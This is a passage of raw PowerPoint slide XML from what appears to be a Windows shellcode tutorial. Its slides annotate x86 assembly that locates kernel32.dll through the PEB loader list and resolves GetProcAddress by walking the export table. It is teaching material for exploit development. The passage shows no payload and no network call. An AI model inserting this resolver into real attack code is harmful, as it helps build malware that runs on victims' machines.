              <a:rPr lang="ro-RO" sz="1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PEB_LDR_DATA, *PPEB_LDR_DATA;</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82419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457200"/>
            <a:ext cx="4191000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Find kernel32.dll</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1981200"/>
            <a:ext cx="8610600" cy="3323987"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000  33C9              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor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ecx,ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            ; ECX = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000002  648B4130          mov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,[fs:ecx+0x30]  ; EAX = PEB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000006  8B400C            mov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,[eax+0xc]      ; EAX = PEB-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ldr</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00000009  8B7014            mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,[eax+0x14]     ; ESI = PEB-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Ldr.In</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Mem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Order </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000000C  AD                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lodsd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                  ; EAX = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Second module</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0000000D  96                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xchg</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eax,esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>           ; EAX = ESI, ESI = EAX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000000E  AD                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lodsd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                  ; EAX = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Third (kernel32)</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0000000F  8B5810            mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,[eax+0x10]     ; EBX = Base address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000012  8B533C            mov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,[ebx+0x3c]     ; EDX = DOS-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>e_lfanew</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00000015  03D3              add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx,ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            ; EDX = PE Header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000017  8B5278            mov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,[edx+0x78]     ; EDX = Offset export table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000001A  03D3              add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx,ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            ; EDX = Export table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000001C  8B7220            mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,[edx+0x20]     ; ESI = Offset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ames</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000001F  03F3              add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esi,ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            ; ESI = Names table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000021  33C9              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor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ecx,ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            ; EXC = 0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1371600"/>
            <a:ext cx="830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457200"/>
            <a:ext cx="4876800" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Find GetProcAddress</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1770995"/>
            <a:ext cx="8534400" cy="4401205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000023  41                inc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                ; Loop for each function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000024  AD                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lodsd</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00000025  03C3              add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax,ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            ; Loop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>untill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> function name</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00000027  813847657450      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmp</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],0x50746547        ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GetP</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0000002D  75F4              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jnz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000002F  817804726F6341    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmp</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[eax+0x4],0x41636f72    ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rocA</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00000036  75EB              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jnz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000038  81780864647265    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmp</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[eax+0x8],0x65726464    ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ddre</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0000003F  75E2              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jnz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x23</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00000041  8B7224            mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,[edx+0x24]   ; ESI = Offset ordinals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000044  03F3              add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esi,ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ; ESI = Ordinals table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000046  668B0C4E          mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cx</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esi+ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*2]   ; C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = Number </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>of function</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0000004A  49                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dec</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a:t>
            </a:r>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0000004B  8B721C            mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,[edx+0x1c]   ; ESI = Offset address table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0000004E  03F3              add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esi,ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ; ESI = Address table</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00000050  8B148E            mov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esi+ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*4]  ; EDX = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Pointer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(offset)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000053  03D3              add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx,ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          ; EDX = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GetProcAddress</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457200"/>
            <a:ext cx="4114800" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
